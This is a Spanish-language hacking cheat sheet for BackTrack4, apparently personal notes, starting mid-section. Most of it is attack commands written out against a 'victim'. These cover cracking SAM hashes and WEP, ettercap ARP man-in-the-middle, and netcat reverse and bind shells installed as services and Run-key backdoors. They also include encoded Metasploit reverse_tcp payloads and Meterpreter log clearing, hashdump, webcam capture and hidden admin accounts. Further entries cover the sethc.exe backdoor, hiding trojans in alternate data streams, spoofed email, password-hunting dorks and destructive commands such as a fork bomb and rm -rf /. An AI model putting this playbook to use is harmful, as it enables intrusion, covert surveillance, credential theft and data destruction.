    2 Caracteres todas las letras minúsculas y los números.
    $john -stdout=2 -i=alnum > /home/intrude/Worldlist.txt

    Ojo:
    Todo los password ya crackeados en la pc se acumulan en john.pot .
    *******************************************************************************
    *******************************************************************************
    Hacer una lista de caracteres personalizada para generar Worldlist.txt con
    John the Ripper.

    Se debe crackear un hash primero por ejemplo.
    /home/intrude/.john/hash.txt
    -----------------------------------------------------------------------------
    Administrador:500:b757bf5c0d87772faad3b435b51404ee:7ce21f17c0aee7fb9ceba532d0546ad6:::
    -----------------------------------------------------------------------------
    $sudo john hash.txt

    Una vez hallado el password 1234 vamos a
    $cd /usr/share/john

    Para tener todos los *.chr juntos.
    Luego hacemos un custom.chr que contenga solo 1234.
    $sudo john --make-charset=custom.chr /home/intrude/.john/hash.txt

    Editamos la connfiguracion de john para poder hacer un incremento de nuestro
    custom.chr
    $sudo gedit /etc/john/john.cfg
    -----------------------------------------------------------------------------
    [Incremental:Custom]
    File = /usr/share/john/custom.chr
    MinLen = 1
    MaxLen = 8
    CharCount = 4
    #Caracteres adicionales y consideremos que ya tenemos 1234 en el custom.chr.
    #Deberiamos hacer un hash con lo que consideremos que siempres estara.
    #Porque al poner 1234 ya sabes que va estar en las combinaciones.
    #Ahora que ya sabemos pienso que es mejor hacer un hash con " ".
    Extra = abcdefghiklm
    -----------------------------------------------------------------------------
    Finalmente procedemos.
    $john -stdout=2 -i=custom > /home/intrude/Worldlist.txt

    Donde se nos creara un Worldlist.txt que contendrá un Len = 2 con todas las combinaciones posibles con los custom 1 2 3 4
    más los caracteres declarado en Extra =

    *******************************************************************************
    *******************************************************************************
    How to set static IP in Backtrack4
    $nano /etc/network/interfaces
    -----------------------------------------------------------------------------
    auto lo
    iface lo inet loopback
    #Red cableada
    auto eth0
    iface eth0 inet static
    address 192.168.0.100
    netmask 255.255.255.0
    network 192.168.0.0
    broadcast 192.168.0.255
    gateway 192.168.0.1

    #Red inalámbrica
    auto wlan0
    iface wlan0 inet static
    address 168.254.0.0
    netmask 255.254.0.0
       
    #Red virtualbox
    auto vboxnet0
    iface vboxnet0 inet static
    address 168.254.0.0
    netmask 255.254.0.0
    -----------------------------------------------------------------------------
    Si existe servidor dns:

    $nano /etc/resolv.conf
    -----------------------------------------------------------------------------
    nameserver 192.168.0.1
    -----------------------------------------------------------------------------

    $/etc/init.d/networking start
    o
    $ifup eth0
    ó
    $ifconfig eth0 up

    Si se hace cualquier cambio:
    $/etc/init.d/networking restart

    Para parar:
    $/etc/init.d/networking stop
    ó
    $ifdown eth0
    ó
    $ifconfig eth0 down

    *******************************************************************************
    *******************************************************************************
    Configurar Wifi en modo grafico.
    $/etc/init.d/wicd start
    ó
    $start-network

    *******************************************************************************
    *******************************************************************************
    Muestra los dispositivos inalámbricos disponibles para realizar el airmon-ng.
    $airmon-ng
    wlan0           Atheros         ath5k - [phy0]

    *******************************************************************************
    *******************************************************************************
    Iniciar la wlan o pararla
    $ifconfig wlan0 up
    $ifconfig wlan0 down

    *******************************************************************************
    *******************************************************************************
    Determinar puerto abiertos de una pc remotamente.
    $nmap -vv 192.168.0.2

    PORT      STATE SERVICE
    135/tcp   open  msrpc
    139/tcp   open  netbios-ssn
    445/tcp   open  microsoft-ds
    1110/tcp  open  nfsd-status
    3389/tcp  open  ms-term-serv
    6002/tcp  open  X11:2
    19780/tcp open  unknown
    MAC Address: 00:18:F3:71:6C:68 (Asustek Computer)

    *******************************************************************************
    *******************************************************************************
    Ettercap
    $nano /etc/etter.conf

    #---------------
    #     Linux
    #---------------

    # if you use ipchains:
      #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
      #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

    # if you use iptables:
      #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
      #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

    *******************************************************************************
    *******************************************************************************
    Setting your IP manually

    root@bt:~# ifconfig eth0 192.168.1.112/24
    root@bt:~# route add default gw 192.168.1.1
    root@bt:~# echo nameserver 192.168.1.1 > /etc/resolv.conf

    *******************************************************************************
    *******************************************************************************
    Wifi WEP

    $startx
    $/etc/init.d/networking start
    $airmon-ng
    $airmon-ng stop (interface)
    $ifconfig (interface) down

    Cambiar la mac de la wlan0 ("FakeMac") valido si quisiera hacerse para eth0
    en fin cualquier interface.
    $macchanger --mac 00:11:22:33:44:55 (interface)
    $airmon-ng start (interface)

    $airodump-ng (interface)
    ctrl + c
    $airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
    $aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

    ctrl + c
    $airodump-ng w wep c [channel number] bssid [Bssid number] [wireless card name]
    $aireplay-ng -1 0 -a [bssid] [wireless card name]
    $aireplay-ng -3 b [bssid][wireless card name]
    ctrl + c
    dir
    $aircrack-ng [filename]

    *******************************************************************************
    *******************************************************************************
    Buscar un fichero.
    $find  -name '*.rmvb'

    *******************************************************************************
    *******************************************************************************
    Nmap.
    $namp -sS -P0 -F -O -d -vv -T3                  KAV
    $nmap 192.168.0.2                            KAV
    $nmap -vv 192.168.0.2 -p 135                NoKAV
    $nmap -vv 192.168.0.2 -p 135,445            NoKAV
    $nmap -vv 192.168.0.2 -p 0-65535            KAV

    Salvar los resultados de salidas de forma complensible.
    $nmap -sF 10.10.10.1/24 -oN outfile

    Mantener ocupado los NDIS
    $nmap -sS 10.10.10.1 -D 192.168.0.1


    Comando Nmap en aplicaciones de BackTrack4.
    Intense Scan
    msf > db_nmap -T5 -A -v 192.168.0.2              KAV
    Quick Scan
    msf > db_nmap -T5 -F 192.168.0.2               NoKAV
    Quick Scan (OS Detect)
    msf > db_nmap -sV -T5 -O -F --version-light 192.168.0.2 NoKAV

    *******************************************************************************
    *******************************************************************************
    Normal Open Ports in Windows XP Sp2 Professional

    PORT      STATE SERVICE
    135/tcp   open  msrpc
    139/tcp   open  netbios-ssn
    445/tcp   open  microsoft-ds
    1110/tcp  open  nfsd-status                      KAV
    3389/tcp  open  ms-term-serv

    *******************************************************************************
    *******************************************************************************
    Crack rar zip 7z
    root@bt:/pentest/passwords/rarcrack# ./rarcrack /media/ALAIN\ V/Password/Foto
    s.zip --threads 12 --type zip

    *******************************************************************************
    *******************************************************************************
    Obtener el SAM localmente con BT4.
    $samdump2 /media/disk/WINDOWS/system32/config/system /media/disk/WINDOWS/system32/config/SAM >hash.txt

    Cracking SAM con John the ripper.
    $./john --format:NT hash.txt

    *******************************************************************************
    *******************************************************************************
    Compilar c files.
    $gcc -o mssmb_poc mssmb_poc.c

    Ejecutar
    $./mssmb_poc
    *******************************************************************************
    *******************************************************************************
    Compilar c files con LCC32.
    C:\lcc\bin>bin mssmb_poc.c
    C:\lcc\bin>lcclnk mssmb_poc.obj
    C:\lcc\bin>mssmb_poc

    *******************************************************************************
    *******************************************************************************
    Habilitar Microsoft Terminal Server. Default Port: 3389.
    C:\>reg setval -k 'HKLM\System\CurrentControlSet\Control\Terminal Server' -v 'fDenyTSConnections' -d "0"

    *******************************************************************************
    *******************************************************************************
    Lista de últimos videos vistos en Media Player Classic.
    HKEY_CURRENT_USER\Software\Gabest\Media Player Classic\Recent File List

    *******************************************************************************
    *******************************************************************************
    Lista de últimos documentos vistos en Microsoft Word
    HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
     
    *******************************************************************************
    *******************************************************************************
    Lista de máquinas a la cuales se le ha hecho Telnet.
    HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default

    *******************************************************************************
    *******************************************************************************
    Transferir ficheros por tftp. Default Port:69.
    PC del Atacante.
    Abrir tftpd32.exe
    Declarar Current Directory "C:\Temp"
    Declarar Server Interface 10.10.0.1  (Ip del atacante)

    PC Víctima.
    PUT sube al Atacante notepad.exe a C:\Temp en el atacante.
    C:\>tftp -i 10.10.0.1 PUT C:\Windows\notepad.exe

    GET descarga del Atacante nc.exe el cual debe estar en C:\Temp ya que es nuestro Current Directory.
    C:\>tftp -i 10.10.0.1 GET nc.exe

    *******************************************************************************
    *******************************************************************************
    Copiar ficheros con nc.
    En la víctima:
    C:\>nc -v -l -p 1234 < C:\windows\notepad.exe
    En el atacante:
    C:\>nc -v 10.10.0.4 1234 > notepad.exe

    Crear un proxy con nc.
    Crear un proxy: Tan sencillo como : nc -l -p 2000 -c "nc host1 22"
    C:\>nc -l -p 2000 -c "nc example.org 22"
    C:\>ncat -v -l 1111 -c "ncat -l 2222"

    Forward Proxy.
    C:\>nc -w \ 20 192.168.1.10 80

    Escanear con nc.
    C:\nc11nt>nc -v -v -z 127.0.0.1 53 25 21 DNS fwd/rev mismatch: localhost != darkstar

    Sniffer con nc.
    C:\nc11nt>nc -v -v -L 127.0.0.1 -p 23 DNS fwd/rev mismatch: localhost != darkstar listening on [any] 23 ... DNS fwd/rev mismatch: localhost != darkstar connect to [127.0.0.1] from localhost [127.0.0.1] 1131 login: sniffado password: jeje!!

    Redirect a connection.
    C:\>nc -l -p 1234 localhost 19080
    C:\>nc -l -p 80 | nc localhost 3128

    Redirect a connection.
    C:\>nc -l -p 12345 | nc www.google.com 80

    *******************************************************************************
    *******************************************************************************
    Pasar un servicio deshabilitado a habilitado (Telnet).
    C:\>sc config tlntsvr start= auto

    Restaurarlo.
    C:\>sc config tlntsvr start= disabled

    Iniciar un servicio.
    C:\>sc start tlntsvr

    *******************************************************************************
    *******************************************************************************
    Crear un servicio nuevo.
    C:\>sc \\victima create svchost binPath= C:\WINDOWS\system\serviciosecreto.exe
    C:\>sc \\victima start svchost

    Otro.
    C:\>sc \\victima create backdoor binpath= "cmd /C C:\nc.exe -dLp 6666 -e cmd.exe" type= own type= interact
    C:\>sc \\victima start backdoor

    C:\>sc create Network Connections Service binPath= "cmd /K start C:\nc.exe –d 192.168.1.70 1234 –e cmd.exe" start= auto error= ignore
    C:\>sc create "Proxy" DisplayName= "MySQL Proxy" start= "auto" » binPath=
    C:\>sc config NewService binpath= "ntsd -d C:\windows\system32\NewServ.exe"

    Localmente.
    C:\>sc create spooler binPath= "C:\WINDOWS\system32\spoolsv.exe"

    Hacer que levante desde registro aunque se puede hacer desde el propio sc y es más under:
    C:\>reg add \\victima\HKEY_LOCAL_MACHINE\software\microsoft\windows\CurrentVersion\Run\ /v Path / t REG_SZ /d C:\WINDOWS\system\serviciosecreto.exe

    *******************************************************************************
    *******************************************************************************
    Conociendo hash de la Víctima
    --------------------------------------------------------------------------------------
    Administrador:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
    --------------------------------------------------------------------------------------

    Podemos usar PSExec de la siguiente forma:

    msf > use windows/smb/psexec
    msf exploit(psexec) > set payload windows/meterpreter/bind_tcp
    msf exploit(psexec) > set RHOST 192.168.57.131
    msf exploit(psexec) > set SMBUser administrador
    msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c

    *******************************************************************************
    *******************************************************************************
    Esto es actualmente detectado por casi cualquier antivirus, pero el conocimiento nunca está de más.

    Crear un payload ejecutable:
    $./msfpayload windows/shell/reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/7.exe

    Crear el mismo payload codificado con 3 enconder, 10 iteraciones el 1er encoder, 10 iteraciones el 2do encoder y 1 iteración el último encoder para un total de 21 iteración:
    $./msfpayload windows/shell/reverse_tcp LHOST=172.16.104.130 LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai -t raw -c 10 | ./msfencode -e x86/call4_dword_xor -t raw -c 10 | ./msfencode -e x86/countdown -t exe > /tmp/6.exe

    Comprobar salida del ejecutable:
    $file /tmp/6.exe

    Conectarse al payload una vez ejecutado en la víctima:
    $./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=172.16.104.130 LPORT=31337 E

    *******************************************************************************
    *******************************************************************************
    Meterpreter
    Limpiar eventos de windows.
    meterpreter >  clearev

    Cargar modulo incógnito.
    meterpreter >  use incognito

    Hacernos pasar por un usuario existente después de haber cargado incógnito
    meterpreter >  list_tokens -u

    Delegation Tokens Available
    ========================================
    NT AUTHORITY\LOCAL SERVICE
    NT AUTHORITY\NETWORK SERVICE
    NT AUTHORITY\SYSTEM
    SNEAKS.IN\Administrator

    Impersonation Tokens Available
    ========================================
    NT AUTHORITY\ANONYMOUS LOGON

    meterpreter >  impersonate_token SNEAKS.IN\\Administrator

    Dejar servicio de Meterpreter como un BACKDOOR default port:31337
    meterpreter > run metsvc

    Nota: Para conectarse es necesario usar exploit multi/handler y el PAYLOAD windows/metsvc_bind_tcp correctamente configurado.

    Ejecutar un programa por defecto estamos en C:\windows\system32\cmd.exe
    meterpreter >  execute -f cmd.exe

    Obtener lista de procesos de la pc víctima.
    meterpreter >  ps

    Parar un proceso en específico.
    meterpreter >  kill PID
    ó
    meterpreter >  execute -f "taskkill /f /im cmd.exe"

    Pasar de Meterpreter a CMD
    meterpreter >  execute -f cmd.exe -i -c -H

    Crear un usuario
    meterpreter >  execute -f "net user loko loko /add"

    Agregar un usuario al grupo de administradores
    meterpreter >  execute -f "net localgroup administradores loko /add"

    Ocultar el usuario loko de la pantalla de bienvenida
    Mejor usar registro remoto.
    meterpreter >  execute -f "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v loko /t REG_DWORD /d 00000000"

    Toyanizar netcat después de meterpreter.
    meterpreter >  upload /root/nc.exe C:\\WINDOWS\\SYSTEM32\\ OK!
    meterpreter >  reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v Hacked -d 'C:\Windows\System32\nc.exe -L -d -p 1234 -e cmd.exe'  
    meterpreter >  reg setval -k HKLM\Software\Microsoft\Windows\CurrentVersion \Run -v CIAUZ -d "C:\WINDOWS\SYSTEM32\nc.exe -L -d -p 1111 -e cmd.exe"

    Obtener un dump de SAM de la PC víctima.
    meterpreter >  hashdump

    Obtener la posición.
    meterpreter >  getwd

    Obtener una foto del escritorio de la víctima.
    meterpreter >  screenshot

    Obtener lista de webcam disponibles en la pc de la víctima.
    meterpreter >  webcam_list

    Obtener una imagen de la webcam disponible.
    meterpreter >  webcam_snap 1

    Habilitar Microsoft Terminal Server. Default Port: 3389.
    Con usuario "hax0r" y password "gibs0n"
    meterpreter > run getgui -u hax0r -p gibs0n

    Activar sniffer en la víctima.
    meterpreter > use sniffer
    Loading extension sniffer...success.

    meterpreter > help

    meterpreter > sniffer_interfaces

    1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )

    meterpreter > sniffer_start 1
  • Capture started on interface 1 (200000 packet buffer)

    meterpreter > sniffer_dump 1 all.cap
  • Dumping packets from interface 1...
  • Wrote 19 packets to PCAP file all.cap

    meterpreter > sniffer_dump 1 all.cap
  • Dumping packets from interface 1...
  • Wrote 199 packets to PCAP file all.cap
    meterpreter > sniffer_stop 1

    Nota: Los PCAP serán guardados en C:\Program Files\Rapid7\framework\msf3

    *******************************************************************************
    *******************************************************************************
    Ver el volumen de una unidad.
    C:\>vol

    *******************************************************************************
    *******************************************************************************
    Catalogo rápido con CathyCMD.
    C:\>Cathycmd -f Cathy.CMD

    Catálogo de C
    C:\>dir /s >CatalogoC.txt

    Catálogo de disco duro con LINUX
    $cd /media/sda1
    $ls -R > /home/intrude/Catalogo_SDA1.txt

    Nota:
    En teoría se puede hacer desde comando la pregunta es si algún editor de texto sería capaz
    de mostrarnos todas los directorios de un HDD de 1000 GB. Aquí es donde está la importancia
    del Cathy.
    *******************************************************************************
    *******************************************************************************
    Instalar telnet en windows vista y windows 7.
    C:\>pkgmgr /iu:"TelnetClient"
    C:\>pkgmgr /iu:"TelnetServer"

    *******************************************************************************
    *******************************************************************************
    Ocultar un usuario de la pantalla de bienvenida.
    Mejor usar registro remoto.
    C:\>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v loko /t REG_DWORD /d 00000000

    *******************************************************************************
    *******************************************************************************
    Evitar PING.
    $echo 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all

    Aceptar PING.
    $echo 0 >/proc/sys/net/ipv4/icmp_echo_ignore_all

    *******************************************************************************
    *******************************************************************************
    Descargar Sitio WEB completo.
    $wget -r http://www.lawebquesea.com

    Descargar Sitios atendiendo una lista en un TXT.
    $wget -r -i listadewebs.txt

    *******************************************************************************
    *******************************************************************************
    Si el usuario tiene password, usa autologin aquí está su usuario y password sin cifrado.
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
    AltDefaultUserName                               loko
    DefaultPassword                                 lokoloko

    *******************************************************************************
    *******************************************************************************
    Determinar proxy que usa la víctima.
    HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Internet Setting

    ProxyServer 192.168.0.1:8080

    *******************************************************************************
    *******************************************************************************
    Sniffer.
    Man in the middle en WIFI.
    $ettercap -i wlan0 -TqM ARP:REMOTE /TARGET1IP/ /TARGET2IP/
    $ettercap -i wlan0 -T -q -M arp /192.168.1.1/ /192.168.1.56/
    $ettercap -T -Q -M arp:remote -i wlan0 /10.10.10.23/ // -P remote_browser
    $ettercap -Tq -i wlan0 -M arp:remote /192.168.1.1/ /192.168.1.102/ -w dump
    $ettercap -i wlan0 -TqM ARP:REMOTE
    $ettercap -Tq -i wlan0 -M arp:remote /192.168.1.101/ /192.168.1.254/
    $ettercap -i wlan0 -P remote_browser -T -q -M arp:remote /192.168.0.1/ /192.168.0.14/
    $ettercap -T -q -i wlan0 -M ARP:remote /192.168.0.135/ //
    $ettercap -T -i wlan0 -M arp:remote /192.168.1.1/ /192.168.1.102/ -P dns_spoof


    $tcpdump –Xx –s 500 –n

    $tcpdump -n host 192.168.0.2
    $tcpdump -n src net 192.168.0
    $tcpdump -n net 192.168.0.2
    $tcpdump -nXs 0 port 110 or 25 or 20 or 21 or 23

    Envenenamiento ARP sslstrip.
    $arpspoof -i wlan0? instead of "arpspoof -i wlan0 -t 192.168.1.xx 192.168.1.1
    en otra Shell.
    $ettercap -T -q -i wlan0 /192.168.1.1/ /192.168.1.56/
    *******************************************************************************
    *******************************************************************************

    Ver el Servicio Netbios que está corriendo y MAC.
    C:\>nbtstat -A 192.168.0.11

    Mostrar todos los dispositivos de RED y sus IP STATIC.
    C:\>nbtstat -s

    *******************************************************************************
    *******************************************************************************
    Comando NET.

    Crear un usuario remotamente.
    C:\>net user loko loko /add

    Pasarlo al grupo de administradores.
    C:\>net localgroup administradores loko /add

    Cambiar contraseña.
    C:\>net user loko  12345

    Crear usuario sin contraseña.
    C:\>net user loko /add

    Ver los recursos compartido (Local).
    C:\>net share

    Mostrar los recursos compartidos usados.
    C:\>net use

    Mostrar detalle del recurso conectado.
    C:\>net use \\192.168.0.2\g$

    Para eliminar recursos compartidos usados.
    C:\>net use \\192.168.0.2\g$ /delete

    Conectarse a IPC$.
    C:\>net use \\192.168.0.2\IPC$ "loko" /user:"loko"
    ó
    C:\>net use \\192.168.0.2\IPC$ loko /user:loko

    Compartir una carpeta.
    secretaria = nombre a mostrar de la carpeta compartida.
    C:\cartas = ruta a compartir .
    C:\>net share secretaria=C:\cartas

    Compartir un carpeta con espacio.
    C:\>lista="C:\lst fig"

    Montar en la unidad z un recurso compartido.
    C:\>net use z: \\financiero\cartas
    Ejemplo con espacio.
    C:\>net use k: "\\financiero 2"\circulares

    Desmotar un recurso compartido de la unidad z.
    C:\>net use z: /delete

    Eliminar la carpeta compartida.
    C:\>net share secretaria /delete

    Ver lista de equipos en RED.
    C:\>net view

    Ver sesiones abiertas (Local).
    C:\>net session

    *******************************************************************************
    *******************************************************************************
    Ver ficheros abiertos (Local).
    C:\>openfiles

    Ver conexiones activas TCP.
    C:\>netstat -anp TCP

    Ver puertos abiertos y muy importante el PID
    C:\>netstat -ano

    El PID lo podemos ver en el taskmanager solo que hay que decirle que lo muestre.  

    Ver todos los privilegios de un usuario.
    C:\>whoami

    *******************************************************************************
    *******************************************************************************
    Obtener IP, MAC y SERVICIO.
    C:\>arp -a
    *******************************************************************************
    *******************************************************************************
    Ver version de nuestro windows.
    Bien
    C:\>systeminfo
    Win+PAUSE
    C:\>winver

    *******************************************************************************
    *******************************************************************************
    Obtener MAC de los dispositivos de red.
    C:\>getmac

    *******************************************************************************
    *******************************************************************************
    Configurar permisos archivos y carpetas en modo cmd.
    C:\>cacls

    *******************************************************************************
    *******************************************************************************
    Ir a document and settings del usuario iniciado.
    %homepath%

    Ir a los temporales del usuario iniciado.
    %temp%

    Ir a la carpeta de instalación Windows.
    %windir%
    *******************************************************************************
    *******************************************************************************
    Montar partición en Linux.
    $mount -t <file system(ext2,vfat)> <partición (/dev/hda1,/dev/cdrom)> <punto de lecutra"mount point" (/mnt/home/ /mnt/cdrom)

    *******************************************************************************
    *******************************************************************************
    Montar particiones remotas con samba.
    $smbmount //IP/C$ /home/juseth -o\user=[usuario],pass=[pass],dom=[dominio]

    *******************************************************************************
    *******************************************************************************
    Búsquedas interesantes en Google.
    file
    -inurl:(htm|html|php)+intitle:"index+of"+"last+modified"+"parent+directory"+description+size+(.mp3|.wma)+"Korn"
    -inurl:(htm|html|php)+intitle:"index+of"+"last+modified"+"parent+directory"+description+size+(.doc|.rtf|.pdf)+"Korn"

    Password
    http://www.google.com/search?q=intitle%3A%22Index+of%22+passwords+modified+site%3AKorn
    http://www.google.com/search?hl=en&q=allinurl%3Aauth_user_file.txt+site%3AKorn
    http://www.google.com/search?q=inurl%3Apasslist.txt&btnG=Search+site%3AKorn
    http://www.google.com/search?q=%22%23+-FrontPage-%22+inurl%3Aservice.pwd+site%3AKorn
    http://www.google.com/search?q=intitle%3A%22Index+of%22+config.php+site%3AKorn
    http://www.google.com/search?q=%22http%3A%2F%2F*%3A*%40%22Korn

    Proxy
    http://www.google.com/translate?langpair=en|en&u=Korn
    http://www.google.com/gwt/n?u=http%3A%2F%2FKorn

    HEX DEC ASCII
    %7C 124 |
    %3A 58  :
    %28 40  (
    %29 41  )
    %22 34  "
    %2B 43  +

    "index of/private" + "Parent Directory"
    intitle:index.of .bash_history
    intitle:index of "Parent Directory" pass site:cu
    intitle:index.of .sh_history
    filetype:pdf
    site.gov.cu

    *******************************************************************************
    *******************************************************************************
    Saltando la protección DisableRegistryTools WindowsXpSp3.
    Este es un error súper viejo que al parecer a Windows no le importa :).

    Primero quitamos el permiso al registro como lo haría cualquier administrador.
    C:\>reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 00000001

    Si todo va bien debería salir " El administrador a deshabilitado la modificación del Registro."

    Hacemos una copia de c:\Windows\regedit.exe porque es muy importante siempre conservar el original.

    Abrimos con OllyDbg nuestra copia de Regedit salvada en C:\Temp\regedit.exe
    Click derecho Search For> All referenced strings
    Veremos una dirección muy curiosa a la que haremos doble click.
    -------------------------------------------------------------------------------
    01009A59 Push DisableRegeditTools.01001904 UNICODE "DisableRegistryTools"
    -------------------------------------------------------------------------------
    Esto nos llevará a la sección del ejecutable donde se encuentra esta referencia.
    Nos fijamos en la dirección de comienzo:
    -------------------------------------------------------------------------------
    01009A4A .v 75 4F JNE SHORT DisableRegeditTools.01009A9B
    -------------------------------------------------------------------------------
    La sentencia salta corto sino es igual (JNE) a la dirección 01009A9B es justo lo
    que necesitamos, solo que como son iguales y no se produce el salto por lo que
    caemos en 01009A59 Push DisableRegeditTools.01001904 UNICODE "DisableRegistryTools"
    Ok pues entonces modificamos a 01009A4A quedando así:
    -------------------------------------------------------------------------------
    01009A4A .v 74 4F JE SHORT DisableRegeditTools.01009A9B
    -------------------------------------------------------------------------------
    Como son iguales entonces se producirá el salto y obviará esta parte :)
    Bueno salvemos los cambios.
    Click Derecho Edit>Copy to Executable

    Resultados:
    Ya tenemos un regedit en C:\Temp>regedit.exe que ignora la llave DisableRegistryTools
    y nos permite modificar el regedit a nuestro antojo.

    *******************************************************************************
    *******************************************************************************
    Crear usuario bajo la falsificación de programas con privilegios de System en la
    pantalla de bienvenida de Windows

    Otro error que tampoco parece importarle a WindowsXpSp3
    Privilegios de System en la pantalla de bienvenida de sethc.exe y utilman.exe
    localizados en:
    C:\Windows\System32>

    Si se logra hacer una copia de cmd.exe localizado en C:\Windows\System32>
    Se debería borrar sethc.exe y renombrar la copia de cmd.exe a sethc.exe
    Cuando se borra sethc.exe el sistema tardará poco tiempo en restablecerlo pero
    el tiempo que demora es más que suficiente para que nosotros renombremos
    nuestra copia de cmd.exe  a sethc.exe.

    Si lo hemos hecho bien la presionar seguido 5 veces shift o simplemente
    turbeamos el shift nos aparecerá el cmd.exe en vez de sethc.exe.

    Nos vamos a la pantalla de bienvenida justo donde sale el control+alt+del
    presionamos estas teclas y presionamos 5 veces shift tendremos un cmd.exe
    con privilegios de system. Donde podremos crear un usuario con privilegios
    de administración.

    El procedimiento con utilman es similar solo que se presiona Win+U en vez de 5
    veces shift.

    Como pueden ver una vez modificados estos ficheros es muy difícil perder la
    administración de un sistema al cual tengamos acceso físico.

    Por otra parte dudo mucho que usen mucho utilman y sethc :) así que pueden prescindir
    de ellos.  

    *******************************************************************************
    *******************************************************************************
    Crear fichero con caracteres no validos mediante notepad.
    Si otro error más super viejo que existe aun en Windows7
    Normalmente windows no deja crear ficheros con caracteres especiales
    Ejemplo:
    Hidd$en
    Hid:den
    Hidde/n

    c:\>notepad.exe text.txt

    -------------------------------------------------------------------------------
    Hello World
    -------------------------------------------------------------------------------
    Todo bien y si ponemos

    c:\>notepad.exe text.txt:Hidden.txt

    -------------------------------------------------------------------------------
    Esto solo se lee poniendo c:\>notepad.exe text.txt:Hidden.txt mas nada en
    windows lo ve porque text.txt:Hidden.txt contiene el caracter especial ":"
    En fin notepad a creado un fichero que para windows no es indexable.
    A decir verdad nose si se vea desde linux creo que la solución sería formatear
    jajajajajaja.
    Siempre hay que poner algo .txt y después la barrabasada que se les ocurra.
    Alternate Data Stream (ADS) permite hacer cosas muy interesantes basada en esta
    técnica y todo se debe que al paracer NTFS no soporta caracteres especiales en su
    partición o windows no supo como hacerlo y otros si, averiguen ustedes.

    Si se borra el fichero text.txt se pierde el acceso a  text.txt:Hidden.txt

    Si pornemos directo c:\>notepad.exe ADS.txt:Hidden.txt se crea ADS.txt en blanco y
    se borra perdemos lo escrito en ADS.txt:Hidden.txt


    Sysinternals elaboró una herramienta llamada streams que nos permite ver ó borrar
    ficheros con esta características.
    Hacer una busqueda recursiva.
    c:\>streams -s c:\

    Borrar contenido ADS.
    c:\>streams -d c:\

    Este fallo solo es en particiones NTFS
    -------------------------------------------------------------------------------

    Se puede usar esto para cosas como troyanos.
    Moviendo trojan.exe para readme.txt(stream)
    c:\type c:\trojan.exe > c:\readme.txt:trojan.exe
    Ejecutando stream
    c:\start c:\readme.txt:trojan.exe
    extrayendo trojan.exe de readme.txt(stream)
    c:\cat c:\readme.txt:trojan.exe > trojan.exe

    *******************************************************************************
    *******************************************************************************
    Tanto EncodeBMP como Blindside nos permiten ocultar cosas dentro de una imagen BMP
    EncodeBMP no tiene caso es muy sencillo y tiene ambiente gráfico.
    En Blindside se extrae:
    c:\Blindside\bside.exe -x decode Imagen.BMP

    MP3Stego nos permite esconder cosas en ficheros MP3

    Ocultando en MP3.
    c:\MP3Stego>encode -E hidden_text.txt -P pass svega.wav svega_stego.mp3

    Desocultando en MP3.
    c:\MP3Stego>decode -X -P pass svega_stego.mp3

    Si se desea documentarse mas la tecnica es conocida como steganography

    Herramientas conocidas de para esconder informacion.
    makestrm
    LADS
    LNS
    Steganography
    FreeSteganography
    MP3Stego
    snow

    *******************************************************************************
    *******************************************************************************
    Enviar correo anónimo.

    C:\>telnet mail.example.com 25
    Trying 192.168.1.101...
    Connected to mail.example.com.
    Escape character is '^]'.
    220 mail.example.com ESA3400/SMTP Ready.
    C:\>HELO mail.fakehost.com
    250 Requested mail action okay, completed.
    C:\>MAIL FROM:<attacker@fakehost.com>
    250 Requested mail action okay, completed.
    C:\>RCPT TO:<nick@example.com>
    250 Requested mail action okay, completed.
    C:\>DATA
    354 Enter mail, end with "." on a line by itself.
    C:\>From: Tony Spinelli <tony@example.com>
    C:\>To: Nick Nedostup <nick@example.com>
    C:\>Subject: Please call me about your review
    C:\>Nick,
    C:\>It is time for year-end reviews. Please contact me on my new personal
    C:\>cellphone number 555-1212, so that we can discuss your performance.
    C:\>By the way, if I don't answer, just leave me a voicemail.. I'm in
    C:\>meetings all day. Also see if you can add me on Yahoo! Messenger,
    C:\>my handle is t0nyspinelli.
    C:\>Tony Spinelli
    C:\>Example Corp.
    C:\>Office: 555-1111
    C:\>Mobile: 555-1212 (NEW)
    C:\>.
    250 Ok: queued as 12345
    C:\>QUIT

    *******************************************************************************
    *******************************************************************************
    Escuchar el sonido del disco duro, no es perjudicial.
    $sudo cat /dev/sda | aplay -fdat

    *******************************************************************************
    *******************************************************************************
    Ejecuta muchos comandos hasta bloquear linux, se le conoce como forkbomb.
    $:(){:|:&};:

    Borra todo los fichero desde / recursivamente es equivalente a un format Windows
    $m -rf /

    Sobrescribe el dispositivo /dev/sda provando la perdida de todos los datos
    $cualquier_comando > /dev/sda

    *******************************************************************************
    *******************************************************************************
    Borrando huellas
    Claves del registro que debemos considerar.
    HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\AuditBaseObjects
